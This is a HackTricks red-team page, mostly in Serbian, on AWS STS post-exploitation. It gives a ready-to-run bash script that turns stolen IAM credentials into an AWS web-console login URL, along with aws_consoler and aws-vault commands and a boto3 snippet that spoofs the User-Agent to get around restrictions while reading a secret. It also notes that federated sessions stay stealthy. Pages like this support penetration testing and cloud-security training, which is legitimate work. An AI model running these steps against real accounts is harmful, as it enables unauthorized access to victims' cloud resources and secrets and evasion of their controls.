AWS - STS Post Exploitation

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

STS

Za više informacija:

AWS - IAM, Identity Center & SSO Enum

Od IAM kredencijala do konzole

Ukoliko ste uspeli da dobijete neke IAM kredencijale, možda ćete želeti da pristupite web konzoli koristeći sledeće alate.\ Napomena: korisnik/rola mora imati dozvolu sts:GetFederationToken.

Prilagođeni skript

Sledeći skript će koristiti podrazumevani profil i podrazumevanu AWS lokaciju (not gov and not cn) da bi vam dao potpisani URL koji možete koristiti za prijavu u web konzolu:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Možete generisati link za web konzolu pomoću https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Warning

Uverite se da IAM korisnik ima dozvolu sts:GetFederationToken, ili obezbedite role koje se mogu preuzeti.

aws-vault

aws-vault je alat za sigurno čuvanje i pristup AWS credentials-ima u razvojnom okruženju.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Note

Takođe možete koristiti aws-vault da dobijete sesiju konzole pretraživača

Od Web Console do IAM Creds

Ekstenzija pretraživača https://github.com/AI-redteam/clier može presretati IAM credentials sa mreže pre nego što budu zaštićeni u memoriji pretraživača.

Zaobilaženje ograničenja User-Agent iz Pythona

Ako postoji ograničenje za izvođenje određenih radnji na osnovu User-Agent-a koji se koristi (npr. ograničavanje upotrebe python boto3 library na osnovu User-Agent-a), moguće je iskoristiti prethodnu tehniku da povežete na web console preko browsera, ili možete direktno izmeniti boto3 User-Agent tako što ćete:

# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])

sts:GetFederationToken

Sa ovom dozvolom moguće je kreirati federisani identitet za korisnika koji je koristi, ograničen na dozvole koje taj korisnik ima.

aws sts get-federation-token --name <username>

Token koji vraća sts:GetFederationToken pripada federated identity pozivajućeg korisnika, ali sa ograničenim dozvolama. Čak i ako korisnik ima administratorska prava, određene akcije, kao što su listanje IAM korisnika ili attaching policies, ne mogu se izvršiti putem federated tokena.

Pored toga, ova metoda je donekle stealthy, pošto se federated user ne pojavljuje u AWS Portal; može se uočiti samo kroz CloudTrail logove ili monitoring alate.

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.